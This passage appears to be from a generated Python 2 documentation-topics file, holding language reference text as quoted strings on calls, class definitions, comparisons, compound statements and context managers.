When all arguments have\n' 'been processed, the slots that are still unfilled are filled with ' 'the\n' 'corresponding default value from the function definition. ' '(Default\n' 'values are calculated, once, when the function is defined; thus, a\n' 'mutable object such as a list or dictionary used as default value ' 'will\n' "be shared by all calls that don't specify an argument value for " 'the\n' 'corresponding slot; this should usually be avoided.) If there are ' 'any\n' 'unfilled slots for which no default value is specified, a ' '"TypeError"\n' 'exception is raised. Otherwise, the list of filled slots is used ' 'as\n' 'the argument list for the call.\n' '\n' '**CPython implementation detail:** An implementation may provide\n' 'built-in functions whose positional parameters do not have names, ' 'even\n' "if they are 'named' for the purpose of documentation, and which\n" 'therefore cannot be supplied by keyword. In CPython, this is the ' 'case\n' 'for functions implemented in C that use "PyArg_ParseTuple()" to ' 'parse\n' 'their arguments.\n' '\n' 'If there are more positional arguments than there are formal ' 'parameter\n' 'slots, a "TypeError" exception is raised, unless a formal ' 'parameter\n' 'using the syntax "*identifier" is present; in this case, that ' 'formal\n' 'parameter receives a tuple containing the excess positional ' 'arguments\n' '(or an empty tuple if there were no excess positional arguments).\n' '\n' 'If any keyword argument does not correspond to a formal parameter\n' 'name, a "TypeError" exception is raised, unless a formal parameter\n' 'using the syntax "**identifier" is present; in this case, that ' 'formal\n' 'parameter receives a dictionary containing the excess keyword\n' 'arguments (using the keywords as keys and the argument values as\n' 'corresponding values), or a (new) empty dictionary if there were ' 'no\n' 'excess keyword arguments.\n' '\n' 'If the syntax "*expression" appears in the function call, ' '"expression"\n' 'must 
evaluate to an iterable. Elements from this iterable are ' 'treated\n' 'as if they were additional positional arguments; if there are\n' 'positional arguments *x1*, ..., *xN*, and "expression" evaluates to ' 'a\n' 'sequence *y1*, ..., *yM*, this is equivalent to a call with M+N\n' 'positional arguments *x1*, ..., *xN*, *y1*, ..., *yM*.\n' '\n' 'A consequence of this is that although the "*expression" syntax ' 'may\n' 'appear *after* some keyword arguments, it is processed *before* ' 'the\n' 'keyword arguments (and the "**expression" argument, if any -- see\n' 'below). So:\n' '\n' ' >>> def f(a, b):\n' ' ... print a, b\n' ' ...\n' ' >>> f(b=1, *(2,))\n' ' 2 1\n' ' >>> f(a=1, *(2,))\n' ' Traceback (most recent call last):\n' ' File "<stdin>", line 1, in ?\n' " TypeError: f() got multiple values for keyword argument 'a'\n" ' >>> f(1, *(2,))\n' ' 1 2\n' '\n' 'It is unusual for both keyword arguments and the "*expression" ' 'syntax\n' 'to be used in the same call, so in practice this confusion does ' 'not\n' 'arise.\n' '\n' 'If the syntax "**expression" appears in the function call,\n' '"expression" must evaluate to a mapping, the contents of which are\n' 'treated as additional keyword arguments. In the case of a keyword\n' 'appearing in both "expression" and as an explicit keyword argument, ' 'a\n' '"TypeError" exception is raised.\n' '\n' 'Formal parameters using the syntax "*identifier" or "**identifier"\n' 'cannot be used as positional argument slots or as keyword argument\n' 'names. Formal parameters using the syntax "(sublist)" cannot be ' 'used\n' 'as keyword argument names; the outermost sublist corresponds to a\n' 'single unnamed argument slot, and the argument value is assigned ' 'to\n' 'the sublist using the usual tuple assignment rules after all other\n' 'parameter processing is done.\n' '\n' 'A call always returns some value, possibly "None", unless it raises ' 'an\n' 'exception. 
How this value is computed depends on the type of the\n' 'callable object.\n' '\n' 'If it is---\n' '\n' 'a user-defined function:\n' ' The code block for the function is executed, passing it the\n' ' argument list. The first thing the code block will do is bind ' 'the\n' ' formal parameters to the arguments; this is described in ' 'section\n' ' Function definitions. When the code block executes a "return"\n' ' statement, this specifies the return value of the function ' 'call.\n' '\n' 'a built-in function or method:\n' ' The result is up to the interpreter; see Built-in Functions for ' 'the\n' ' descriptions of built-in functions and methods.\n' '\n' 'a class object:\n' ' A new instance of that class is returned.\n' '\n' 'a class instance method:\n' ' The corresponding user-defined function is called, with an ' 'argument\n' ' list that is one longer than the argument list of the call: the\n' ' instance becomes the first argument.\n' '\n' 'a class instance:\n' ' The class must define a "__call__()" method; the effect is then ' 'the\n' ' same as if that method was called.\n', 'class': '\n' 'Class definitions\n' '*****************\n' '\n' 'A class definition defines a class object (see section The ' 'standard\n' 'type hierarchy):\n' '\n' ' classdef ::= "class" classname [inheritance] ":" suite\n' ' inheritance ::= "(" [expression_list] ")"\n' ' classname ::= identifier\n' '\n' 'A class definition is an executable statement. It first evaluates ' 'the\n' 'inheritance list, if present. Each item in the inheritance list\n' 'should evaluate to a class object or class type which allows\n' "subclassing. The class's suite is then executed in a new " 'execution\n' 'frame (see section Naming and binding), using a newly created ' 'local\n' 'namespace and the original global namespace. (Usually, the suite\n' "contains only function definitions.) When the class's suite " 'finishes\n' 'execution, its execution frame is discarded but its local namespace ' 'is\n' 'saved. 
[4] A class object is then created using the inheritance ' 'list\n' 'for the base classes and the saved local namespace for the ' 'attribute\n' 'dictionary. The class name is bound to this class object in the\n' 'original local namespace.\n' '\n' "**Programmer's note:** Variables defined in the class definition " 'are\n' 'class variables; they are shared by all instances. To create ' 'instance\n' 'variables, they can be set in a method with "self.name = value". ' 'Both\n' 'class and instance variables are accessible through the notation\n' '""self.name"", and an instance variable hides a class variable ' 'with\n' 'the same name when accessed in this way. Class variables can be ' 'used\n' 'as defaults for instance variables, but using mutable values there ' 'can\n' 'lead to unexpected results. For *new-style class*es, descriptors ' 'can\n' 'be used to create instance variables with different implementation\n' 'details.\n' '\n' 'Class definitions, like function definitions, may be wrapped by one ' 'or\n' 'more *decorator* expressions. The evaluation rules for the ' 'decorator\n' 'expressions are the same as for functions. The result must be a ' 'class\n' 'object, which is then bound to the class name.\n' '\n' '-[ Footnotes ]-\n' '\n' '[1] The exception is propagated to the invocation stack unless\n' ' there is a "finally" clause which happens to raise another\n' ' exception. 
That new exception causes the old one to be lost.\n' '\n' '[2] Currently, control "flows off the end" except in the case of\n' ' an exception or the execution of a "return", "continue", or\n' ' "break" statement.\n' '\n' '[3] A string literal appearing as the first statement in the\n' ' function body is transformed into the function\'s "__doc__"\n' " attribute and therefore the function's *docstring*.\n" '\n' '[4] A string literal appearing as the first statement in the class\n' ' body is transformed into the namespace\'s "__doc__" item and\n' " therefore the class's *docstring*.\n", 'comparisons': '\n' 'Comparisons\n' '***********\n' '\n' 'Unlike C, all comparison operations in Python have the same ' 'priority,\n' 'which is lower than that of any arithmetic, shifting or ' 'bitwise\n' 'operation. Also unlike C, expressions like "a < b < c" have ' 'the\n' 'interpretation that is conventional in mathematics:\n' '\n' ' comparison ::= or_expr ( comp_operator or_expr )*\n' ' comp_operator ::= "<" | ">" | "==" | ">=" | "<=" | "<>" | ' '"!="\n' ' | "is" ["not"] | ["not"] "in"\n' '\n' 'Comparisons yield boolean values: "True" or "False".\n' '\n' 'Comparisons can be chained arbitrarily, e.g., "x < y <= z" ' 'is\n' 'equivalent to "x < y and y <= z", except that "y" is ' 'evaluated only\n' 'once (but in both cases "z" is not evaluated at all when "x < ' 'y" is\n' 'found to be false).\n' '\n' 'Formally, if *a*, *b*, *c*, ..., *y*, *z* are expressions and ' '*op1*,\n' '*op2*, ..., *opN* are comparison operators, then "a op1 b op2 ' 'c ... y\n' 'opN z" is equivalent to "a op1 b and b op2 c and ... 
y opN ' 'z", except\n' 'that each expression is evaluated at most once.\n' '\n' 'Note that "a op1 b op2 c" doesn\'t imply any kind of ' 'comparison between\n' '*a* and *c*, so that, e.g., "x < y > z" is perfectly legal ' '(though\n' 'perhaps not pretty).\n' '\n' 'The forms "<>" and "!=" are equivalent; for consistency with ' 'C, "!="\n' 'is preferred; where "!=" is mentioned below "<>" is also ' 'accepted.\n' 'The "<>" spelling is considered obsolescent.\n' '\n' 'The operators "<", ">", "==", ">=", "<=", and "!=" compare ' 'the values\n' 'of two objects. The objects need not have the same type. If ' 'both are\n' 'numbers, they are converted to a common type. Otherwise, ' 'objects of\n' 'different types *always* compare unequal, and are ordered ' 'consistently\n' 'but arbitrarily. You can control comparison behavior of ' 'objects of\n' 'non-built-in types by defining a "__cmp__" method or rich ' 'comparison\n' 'methods like "__gt__", described in section Special method ' 'names.\n' '\n' '(This unusual definition of comparison was used to simplify ' 'the\n' 'definition of operations like sorting and the "in" and "not ' 'in"\n' 'operators. In the future, the comparison rules for objects ' 'of\n' 'different types are likely to change.)\n' '\n' 'Comparison of objects of the same type depends on the type:\n' '\n' '* Numbers are compared arithmetically.\n' '\n' '* Strings are compared lexicographically using the numeric\n' ' equivalents (the result of the built-in function "ord()") ' 'of their\n' ' characters. Unicode and 8-bit strings are fully ' 'interoperable in\n' ' this behavior. [4]\n' '\n' '* Tuples and lists are compared lexicographically using ' 'comparison\n' ' of corresponding elements. This means that to compare ' 'equal, each\n' ' element must compare equal and the two sequences must be of ' 'the same\n' ' type and have the same length.\n' '\n' ' If not equal, the sequences are ordered the same as their ' 'first\n' ' differing elements. 
For example, "cmp([1,2,x], [1,2,y])" ' 'returns\n' ' the same as "cmp(x,y)". If the corresponding element does ' 'not\n' ' exist, the shorter sequence is ordered first (for example, ' '"[1,2] <\n' ' [1,2,3]").\n' '\n' '* Mappings (dictionaries) compare equal if and only if their ' 'sorted\n' ' (key, value) lists compare equal. [5] Outcomes other than ' 'equality\n' ' are resolved consistently, but are not otherwise defined. ' '[6]\n' '\n' '* Most other objects of built-in types compare unequal unless ' 'they\n' ' are the same object; the choice whether one object is ' 'considered\n' ' smaller or larger than another one is made arbitrarily but\n' ' consistently within one execution of a program.\n' '\n' 'The operators "in" and "not in" test for collection ' 'membership. "x in\n' 's" evaluates to true if *x* is a member of the collection ' '*s*, and\n' 'false otherwise. "x not in s" returns the negation of "x in ' 's". The\n' 'collection membership test has traditionally been bound to ' 'sequences;\n' 'an object is a member of a collection if the collection is a ' 'sequence\n' 'and contains an element equal to that object. However, it ' 'make sense\n' 'for many other object types to support membership tests ' 'without being\n' 'a sequence. In particular, dictionaries (for keys) and sets ' 'support\n' 'membership testing.\n' '\n' 'For the list and tuple types, "x in y" is true if and only if ' 'there\n' 'exists an index *i* such that either "x is y[i]" or "x == ' 'y[i]" is\n' 'true.\n' '\n' 'For the Unicode and string types, "x in y" is true if and ' 'only if *x*\n' 'is a substring of *y*. An equivalent test is "y.find(x) != ' '-1".\n' 'Note, *x* and *y* need not be the same type; consequently, ' '"u\'ab\' in\n' '\'abc\'" will return "True". 
Empty strings are always ' 'considered to be a\n' 'substring of any other string, so """ in "abc"" will return ' '"True".\n' '\n' 'Changed in version 2.3: Previously, *x* was required to be a ' 'string of\n' 'length "1".\n' '\n' 'For user-defined classes which define the "__contains__()" ' 'method, "x\n' 'in y" is true if and only if "y.__contains__(x)" is true.\n' '\n' 'For user-defined classes which do not define "__contains__()" ' 'but do\n' 'define "__iter__()", "x in y" is true if some value "z" with ' '"x == z"\n' 'is produced while iterating over "y". If an exception is ' 'raised\n' 'during the iteration, it is as if "in" raised that ' 'exception.\n' '\n' 'Lastly, the old-style iteration protocol is tried: if a class ' 'defines\n' '"__getitem__()", "x in y" is true if and only if there is a ' 'non-\n' 'negative integer index *i* such that "x == y[i]", and all ' 'lower\n' 'integer indices do not raise "IndexError" exception. (If any ' 'other\n' 'exception is raised, it is as if "in" raised that ' 'exception).\n' '\n' 'The operator "not in" is defined to have the inverse true ' 'value of\n' '"in".\n' '\n' 'The operators "is" and "is not" test for object identity: "x ' 'is y" is\n' 'true if and only if *x* and *y* are the same object. "x is ' 'not y"\n' 'yields the inverse truth value. [7]\n', 'compound': '\n' 'Compound statements\n' '*******************\n' '\n' 'Compound statements contain (groups of) other statements; they ' 'affect\n' 'or control the execution of those other statements in some way. ' 'In\n' 'general, compound statements span multiple lines, although in ' 'simple\n' 'incarnations a whole compound statement may be contained in one ' 'line.\n' '\n' 'The "if", "while" and "for" statements implement traditional ' 'control\n' 'flow constructs. "try" specifies exception handlers and/or ' 'cleanup\n' 'code for a group of statements. 
Function and class definitions ' 'are\n' 'also syntactically compound statements.\n' '\n' "Compound statements consist of one or more 'clauses.' A clause\n" "consists of a header and a 'suite.' The clause headers of a\n" 'particular compound statement are all at the same indentation ' 'level.\n' 'Each clause header begins with a uniquely identifying keyword ' 'and ends\n' 'with a colon. A suite is a group of statements controlled by a\n' 'clause. A suite can be one or more semicolon-separated simple\n' 'statements on the same line as the header, following the ' "header's\n" 'colon, or it can be one or more indented statements on ' 'subsequent\n' 'lines. Only the latter form of suite can contain nested ' 'compound\n' "statements; the following is illegal, mostly because it wouldn't " 'be\n' 'clear to which "if" clause a following "else" clause would ' 'belong:\n' '\n' ' if test1: if test2: print x\n' '\n' 'Also note that the semicolon binds tighter than the colon in ' 'this\n' 'context, so that in the following example, either all or none of ' 'the\n' '"print" statements are executed:\n' '\n' ' if x < y < z: print x; print y; print z\n' '\n' 'Summarizing:\n' '\n' ' compound_stmt ::= if_stmt\n' ' | while_stmt\n' ' | for_stmt\n' ' | try_stmt\n' ' | with_stmt\n' ' | funcdef\n' ' | classdef\n' ' | decorated\n' ' suite ::= stmt_list NEWLINE | NEWLINE INDENT ' 'statement+ DEDENT\n' ' statement ::= stmt_list NEWLINE | compound_stmt\n' ' stmt_list ::= simple_stmt (";" simple_stmt)* [";"]\n' '\n' 'Note that statements always end in a "NEWLINE" possibly followed ' 'by a\n' '"DEDENT". 
Also note that optional continuation clauses always ' 'begin\n' 'with a keyword that cannot start a statement, thus there are no\n' 'ambiguities (the \'dangling "else"\' problem is solved in Python ' 'by\n' 'requiring nested "if" statements to be indented).\n' '\n' 'The formatting of the grammar rules in the following sections ' 'places\n' 'each clause on a separate line for clarity.\n' '\n' '\n' 'The "if" statement\n' '==================\n' '\n' 'The "if" statement is used for conditional execution:\n' '\n' ' if_stmt ::= "if" expression ":" suite\n' ' ( "elif" expression ":" suite )*\n' ' ["else" ":" suite]\n' '\n' 'It selects exactly one of the suites by evaluating the ' 'expressions one\n' 'by one until one is found to be true (see section Boolean ' 'operations\n' 'for the definition of true and false); then that suite is ' 'executed\n' '(and no other part of the "if" statement is executed or ' 'evaluated).\n' 'If all expressions are false, the suite of the "else" clause, ' 'if\n' 'present, is executed.\n' '\n' '\n' 'The "while" statement\n' '=====================\n' '\n' 'The "while" statement is used for repeated execution as long as ' 'an\n' 'expression is true:\n' '\n' ' while_stmt ::= "while" expression ":" suite\n' ' ["else" ":" suite]\n' '\n' 'This repeatedly tests the expression and, if it is true, ' 'executes the\n' 'first suite; if the expression is false (which may be the first ' 'time\n' 'it is tested) the suite of the "else" clause, if present, is ' 'executed\n' 'and the loop terminates.\n' '\n' 'A "break" statement executed in the first suite terminates the ' 'loop\n' 'without executing the "else" clause\'s suite. 
A "continue" ' 'statement\n' 'executed in the first suite skips the rest of the suite and goes ' 'back\n' 'to testing the expression.\n' '\n' '\n' 'The "for" statement\n' '===================\n' '\n' 'The "for" statement is used to iterate over the elements of a ' 'sequence\n' '(such as a string, tuple or list) or other iterable object:\n' '\n' ' for_stmt ::= "for" target_list "in" expression_list ":" ' 'suite\n' ' ["else" ":" suite]\n' '\n' 'The expression list is evaluated once; it should yield an ' 'iterable\n' 'object. An iterator is created for the result of the\n' '"expression_list". The suite is then executed once for each ' 'item\n' 'provided by the iterator, in the order of ascending indices. ' 'Each\n' 'item in turn is assigned to the target list using the standard ' 'rules\n' 'for assignments, and then the suite is executed. When the items ' 'are\n' 'exhausted (which is immediately when the sequence is empty), the ' 'suite\n' 'in the "else" clause, if present, is executed, and the loop\n' 'terminates.\n' '\n' 'A "break" statement executed in the first suite terminates the ' 'loop\n' 'without executing the "else" clause\'s suite. A "continue" ' 'statement\n' 'executed in the first suite skips the rest of the suite and ' 'continues\n' 'with the next item, or with the "else" clause if there was no ' 'next\n' 'item.\n' '\n' 'The suite may assign to the variable(s) in the target list; this ' 'does\n' 'not affect the next item assigned to it.\n' '\n' 'The target list is not deleted when the loop is finished, but if ' 'the\n' 'sequence is empty, it will not have been assigned to at all by ' 'the\n' 'loop. Hint: the built-in function "range()" returns a sequence ' 'of\n' 'integers suitable to emulate the effect of Pascal\'s "for i := a ' 'to b\n' 'do"; e.g., "range(3)" returns the list "[0, 1, 2]".\n' '\n' 'Note: There is a subtlety when the sequence is being modified by ' 'the\n' ' loop (this can only occur for mutable sequences, i.e. lists). 
' 'An\n' ' internal counter is used to keep track of which item is used ' 'next,\n' ' and this is incremented on each iteration. When this counter ' 'has\n' ' reached the length of the sequence the loop terminates. This ' 'means\n' ' that if the suite deletes the current (or a previous) item ' 'from the\n' ' sequence, the next item will be skipped (since it gets the ' 'index of\n' ' the current item which has already been treated). Likewise, ' 'if the\n' ' suite inserts an item in the sequence before the current item, ' 'the\n' ' current item will be treated again the next time through the ' 'loop.\n' ' This can lead to nasty bugs that can be avoided by making a\n' ' temporary copy using a slice of the whole sequence, e.g.,\n' '\n' ' for x in a[:]:\n' ' if x < 0: a.remove(x)\n' '\n' '\n' 'The "try" statement\n' '===================\n' '\n' 'The "try" statement specifies exception handlers and/or cleanup ' 'code\n' 'for a group of statements:\n' '\n' ' try_stmt ::= try1_stmt | try2_stmt\n' ' try1_stmt ::= "try" ":" suite\n' ' ("except" [expression [("as" | ",") ' 'identifier]] ":" suite)+\n' ' ["else" ":" suite]\n' ' ["finally" ":" suite]\n' ' try2_stmt ::= "try" ":" suite\n' ' "finally" ":" suite\n' '\n' 'Changed in version 2.5: In previous versions of Python,\n' '"try"..."except"..."finally" did not work. "try"..."except" had ' 'to be\n' 'nested in "try"..."finally".\n' '\n' 'The "except" clause(s) specify one or more exception handlers. ' 'When no\n' 'exception occurs in the "try" clause, no exception handler is\n' 'executed. When an exception occurs in the "try" suite, a search ' 'for an\n' 'exception handler is started. This search inspects the except ' 'clauses\n' 'in turn until one is found that matches the exception. An ' 'expression-\n' 'less except clause, if present, must be last; it matches any\n' 'exception. 
For an except clause with an expression, that ' 'expression\n' 'is evaluated, and the clause matches the exception if the ' 'resulting\n' 'object is "compatible" with the exception. An object is ' 'compatible\n' 'with an exception if it is the class or a base class of the ' 'exception\n' 'object, or a tuple containing an item compatible with the ' 'exception.\n' '\n' 'If no except clause matches the exception, the search for an ' 'exception\n' 'handler continues in the surrounding code and on the invocation ' 'stack.\n' '[1]\n' '\n' 'If the evaluation of an expression in the header of an except ' 'clause\n' 'raises an exception, the original search for a handler is ' 'canceled and\n' 'a search starts for the new exception in the surrounding code ' 'and on\n' 'the call stack (it is treated as if the entire "try" statement ' 'raised\n' 'the exception).\n' '\n' 'When a matching except clause is found, the exception is ' 'assigned to\n' 'the target specified in that except clause, if present, and the ' 'except\n' "clause's suite is executed. All except clauses must have an\n" 'executable block. When the end of this block is reached, ' 'execution\n' 'continues normally after the entire try statement. (This means ' 'that\n' 'if two nested handlers exist for the same exception, and the ' 'exception\n' 'occurs in the try clause of the inner handler, the outer handler ' 'will\n' 'not handle the exception.)\n' '\n' "Before an except clause's suite is executed, details about the\n" 'exception are assigned to three variables in the "sys" module:\n' '"sys.exc_type" receives the object identifying the exception;\n' '"sys.exc_value" receives the exception\'s parameter;\n' '"sys.exc_traceback" receives a traceback object (see section ' 'The\n' 'standard type hierarchy) identifying the point in the program ' 'where\n' 'the exception occurred. 
These details are also available through ' 'the\n' '"sys.exc_info()" function, which returns a tuple "(exc_type,\n' 'exc_value, exc_traceback)". Use of the corresponding variables ' 'is\n' 'deprecated in favor of this function, since their use is unsafe ' 'in a\n' 'threaded program. As of Python 1.5, the variables are restored ' 'to\n' 'their previous values (before the call) when returning from a ' 'function\n' 'that handled an exception.\n' '\n' 'The optional "else" clause is executed if and when control flows ' 'off\n' 'the end of the "try" clause. [2] Exceptions in the "else" clause ' 'are\n' 'not handled by the preceding "except" clauses.\n' '\n' 'If "finally" is present, it specifies a \'cleanup\' handler. ' 'The "try"\n' 'clause is executed, including any "except" and "else" clauses. ' 'If an\n' 'exception occurs in any of the clauses and is not handled, the\n' 'exception is temporarily saved. The "finally" clause is ' 'executed. If\n' 'there is a saved exception, it is re-raised at the end of the\n' '"finally" clause. If the "finally" clause raises another ' 'exception or\n' 'executes a "return" or "break" statement, the saved exception ' 'is\n' 'discarded:\n' '\n' ' >>> def f():\n' ' ... try:\n' ' ... 1/0\n' ' ... finally:\n' ' ... return 42\n' ' ...\n' ' >>> f()\n' ' 42\n' '\n' 'The exception information is not available to the program ' 'during\n' 'execution of the "finally" clause.\n' '\n' 'When a "return", "break" or "continue" statement is executed in ' 'the\n' '"try" suite of a "try"..."finally" statement, the "finally" ' 'clause is\n' 'also executed \'on the way out.\' A "continue" statement is ' 'illegal in\n' 'the "finally" clause. (The reason is a problem with the current\n' 'implementation --- this restriction may be lifted in the ' 'future).\n' '\n' 'The return value of a function is determined by the last ' '"return"\n' 'statement executed. 
Since the "finally" clause always executes, ' 'a\n' '"return" statement executed in the "finally" clause will always ' 'be the\n' 'last one executed:\n' '\n' ' >>> def foo():\n' ' ... try:\n' " ... return 'try'\n" ' ... finally:\n' " ... return 'finally'\n" ' ...\n' ' >>> foo()\n' " 'finally'\n" '\n' 'Additional information on exceptions can be found in section\n' 'Exceptions, and information on using the "raise" statement to ' 'generate\n' 'exceptions may be found in section The raise statement.\n' '\n' '\n' 'The "with" statement\n' '====================\n' '\n' 'New in version 2.5.\n' '\n' 'The "with" statement is used to wrap the execution of a block ' 'with\n' 'methods defined by a context manager (see section With ' 'Statement\n' 'Context Managers). This allows common ' '"try"..."except"..."finally"\n' 'usage patterns to be encapsulated for convenient reuse.\n' '\n' ' with_stmt ::= "with" with_item ("," with_item)* ":" suite\n' ' with_item ::= expression ["as" target]\n' '\n' 'The execution of the "with" statement with one "item" proceeds ' 'as\n' 'follows:\n' '\n' '1. The context expression (the expression given in the ' '"with_item")\n' ' is evaluated to obtain a context manager.\n' '\n' '2. The context manager\'s "__exit__()" is loaded for later use.\n' '\n' '3. The context manager\'s "__enter__()" method is invoked.\n' '\n' '4. If a target was included in the "with" statement, the return\n' ' value from "__enter__()" is assigned to it.\n' '\n' ' Note: The "with" statement guarantees that if the ' '"__enter__()"\n' ' method returns without an error, then "__exit__()" will ' 'always be\n' ' called. Thus, if an error occurs during the assignment to ' 'the\n' ' target list, it will be treated the same as an error ' 'occurring\n' ' within the suite would be. See step 6 below.\n' '\n' '5. The suite is executed.\n' '\n' '6. The context manager\'s "__exit__()" method is invoked. 
If an\n' ' exception caused the suite to be exited, its type, value, ' 'and\n' ' traceback are passed as arguments to "__exit__()". Otherwise, ' 'three\n' ' "None" arguments are supplied.\n' '\n' ' If the suite was exited due to an exception, and the return ' 'value\n' ' from the "__exit__()" method was false, the exception is ' 'reraised.\n' ' If the return value was true, the exception is suppressed, ' 'and\n' ' execution continues with the statement following the "with"\n' ' statement.\n' '\n' ' If the suite was exited for any reason other than an ' 'exception, the\n' ' return value from "__exit__()" is ignored, and execution ' 'proceeds\n' ' at the normal location for the kind of exit that was taken.\n' '\n' 'With more than one item, the context managers are processed as ' 'if\n' 'multiple "with" statements were nested:\n' '\n' ' with A() as a, B() as b:\n' ' suite\n' '\n' 'is equivalent to\n' '\n' ' with A() as a:\n' ' with B() as b:\n' ' suite\n' '\n' 'Note: In Python 2.5, the "with" statement is only allowed when ' 'the\n' ' "with_statement" feature has been enabled. It is always ' 'enabled in\n' ' Python 2.6.\n' '\n' 'Changed in version 2.7: Support for multiple context ' 'expressions.\n' '\n' 'See also:\n' '\n' ' **PEP 343** - The "with" statement\n' ' The specification, background, and examples for the Python ' '"with"\n' ' statement.\n' '\n' '\n' 'Function definitions\n' '====================\n' '\n' 'A function definition defines a user-defined function object ' '(see\n' 'section The standard type hierarchy):\n' '\n' ' decorated ::= decorators (classdef | funcdef)\n' ' decorators ::= decorator+\n' ' decorator ::= "@" dotted_name ["(" [argument_list [","]] ' '")"] NEWLINE\n' ' funcdef ::= "def" funcname "(" [parameter_list] ")" ' '":" suite\n' ' dotted_name ::= identifier ("." 
identifier)*\n' ' parameter_list ::= (defparameter ",")*\n' ' ( "*" identifier ["," "**" identifier]\n' ' | "**" identifier\n' ' | defparameter [","] )\n' ' defparameter ::= parameter ["=" expression]\n' ' sublist ::= parameter ("," parameter)* [","]\n' ' parameter ::= identifier | "(" sublist ")"\n' ' funcname ::= identifier\n' '\n' 'A function definition is an executable statement. Its execution ' 'binds\n' 'the function name in the current local namespace to a function ' 'object\n' '(a wrapper around the executable code for the function). This\n' 'function object contains a reference to the current global ' 'namespace\n' 'as the global namespace to be used when the function is called.\n' '\n' 'The function definition does not execute the function body; this ' 'gets\n' 'executed only when the function is called. [3]\n' '\n' 'A function definition may be wrapped by one or more *decorator*\n' 'expressions. Decorator expressions are evaluated when the ' 'function is\n' 'defined, in the scope that contains the function definition. ' 'The\n' 'result must be a callable, which is invoked with the function ' 'object\n' 'as the only argument. The returned value is bound to the ' 'function name\n' 'instead of the function object. Multiple decorators are applied ' 'in\n' 'nested fashion. For example, the following code:\n' '\n' ' @f1(arg)\n' ' @f2\n' ' def func(): pass\n' '\n' 'is equivalent to:\n' '\n' ' def func(): pass\n' ' func = f1(arg)(f2(func))\n' '\n' 'When one or more top-level *parameters* have the form ' '*parameter* "="\n' '*expression*, the function is said to have "default parameter ' 'values."\n' 'For a parameter with a default value, the corresponding ' '*argument* may\n' "be omitted from a call, in which case the parameter's default " 'value is\n' 'substituted. 
If a parameter has a default value, all following\n' 'parameters must also have a default value --- this is a ' 'syntactic\n' 'restriction that is not expressed by the grammar.\n' '\n' '**Default parameter values are evaluated when the function ' 'definition\n' 'is executed.** This means that the expression is evaluated ' 'once, when\n' 'the function is defined, and that the same "pre-computed" value ' 'is\n' 'used for each call. This is especially important to understand ' 'when a\n' 'default parameter is a mutable object, such as a list or a ' 'dictionary:\n' 'if the function modifies the object (e.g. by appending an item ' 'to a\n' 'list), the default value is in effect modified. This is ' 'generally not\n' 'what was intended. A way around this is to use "None" as the\n' 'default, and explicitly test for it in the body of the function, ' 'e.g.:\n' '\n' ' def whats_on_the_telly(penguin=None):\n' ' if penguin is None:\n' ' penguin = []\n' ' penguin.append("property of the zoo")\n' ' return penguin\n' '\n' 'Function call semantics are described in more detail in section ' 'Calls.\n' 'A function call always assigns values to all parameters ' 'mentioned in\n' 'the parameter list, either from position arguments, from ' 'keyword\n' 'arguments, or from default values. If the form ""*identifier"" ' 'is\n' 'present, it is initialized to a tuple receiving any excess ' 'positional\n' 'parameters, defaulting to the empty tuple. If the form\n' '""**identifier"" is present, it is initialized to a new ' 'dictionary\n' 'receiving any excess keyword arguments, defaulting to a new ' 'empty\n' 'dictionary.\n' '\n' 'It is also possible to create anonymous functions (functions not ' 'bound\n' 'to a name), for immediate use in expressions. This uses lambda\n' 'expressions, described in section Lambdas. 
Note that the ' 'lambda\n' 'expression is merely a shorthand for a simplified function ' 'definition;\n' 'a function defined in a ""def"" statement can be passed around ' 'or\n' 'assigned to another name just like a function defined by a ' 'lambda\n' 'expression. The ""def"" form is actually more powerful since ' 'it\n' 'allows the execution of multiple statements.\n' '\n' "**Programmer's note:** Functions are first-class objects. A " '""def""\n' 'form executed inside a function definition defines a local ' 'function\n' 'that can be returned or passed around. Free variables used in ' 'the\n' 'nested function can access the local variables of the function\n' 'containing the def. See section Naming and binding for ' 'details.\n' '\n' '\n' 'Class definitions\n' '=================\n' '\n' 'A class definition defines a class object (see section The ' 'standard\n' 'type hierarchy):\n' '\n' ' classdef ::= "class" classname [inheritance] ":" suite\n' ' inheritance ::= "(" [expression_list] ")"\n' ' classname ::= identifier\n' '\n' 'A class definition is an executable statement. It first ' 'evaluates the\n' 'inheritance list, if present. Each item in the inheritance ' 'list\n' 'should evaluate to a class object or class type which allows\n' "subclassing. The class's suite is then executed in a new " 'execution\n' 'frame (see section Naming and binding), using a newly created ' 'local\n' 'namespace and the original global namespace. (Usually, the ' 'suite\n' "contains only function definitions.) When the class's suite " 'finishes\n' 'execution, its execution frame is discarded but its local ' 'namespace is\n' 'saved. [4] A class object is then created using the inheritance ' 'list\n' 'for the base classes and the saved local namespace for the ' 'attribute\n' 'dictionary. 
The class name is bound to this class object in ' 'the\n' 'original local namespace.\n' '\n' "**Programmer's note:** Variables defined in the class definition " 'are\n' 'class variables; they are shared by all instances. To create ' 'instance\n' 'variables, they can be set in a method with "self.name = ' 'value". Both\n' 'class and instance variables are accessible through the ' 'notation\n' '""self.name"", and an instance variable hides a class variable ' 'with\n' 'the same name when accessed in this way. Class variables can be ' 'used\n' 'as defaults for instance variables, but using mutable values ' 'there can\n' 'lead to unexpected results. For *new-style class*es, ' 'descriptors can\n' 'be used to create instance variables with different ' 'implementation\n' 'details.\n' '\n' 'Class definitions, like function definitions, may be wrapped by ' 'one or\n' 'more *decorator* expressions. The evaluation rules for the ' 'decorator\n' 'expressions are the same as for functions. The result must be a ' 'class\n' 'object, which is then bound to the class name.\n' '\n' '-[ Footnotes ]-\n' '\n' '[1] The exception is propagated to the invocation stack unless\n' ' there is a "finally" clause which happens to raise another\n' ' exception. 
That new exception causes the old one to be ' 'lost.\n' '\n' '[2] Currently, control "flows off the end" except in the case ' 'of\n' ' an exception or the execution of a "return", "continue", or\n' ' "break" statement.\n' '\n' '[3] A string literal appearing as the first statement in the\n' ' function body is transformed into the function\'s "__doc__"\n' " attribute and therefore the function's *docstring*.\n" '\n' '[4] A string literal appearing as the first statement in the ' 'class\n' ' body is transformed into the namespace\'s "__doc__" item ' 'and\n' " therefore the class's *docstring*.\n", 'context-managers': '\n' 'With Statement Context Managers\n' '*******************************\n' '\n' 'New in version 2.5.\n' '\n' 'A *context manager* is an object that defines the ' 'runtime context to\n' 'be established when executing a "with" statement. The ' 'context manager\n' 'handles the entry into, and the exit from, the desired ' 'runtime context\n' 'for the execution of the block of code. Context ' 'managers are normally\n' 'invoked using the "with" statement (described in section ' 'The with\n' 'statement), but can also be used by directly invoking ' 'their methods.\n' '\n' 'Typical uses of context managers include saving and ' 'restoring various\n' 'kinds of global state, locking and unlocking resources, ' 'closing opened\n' 'files, etc.\n' 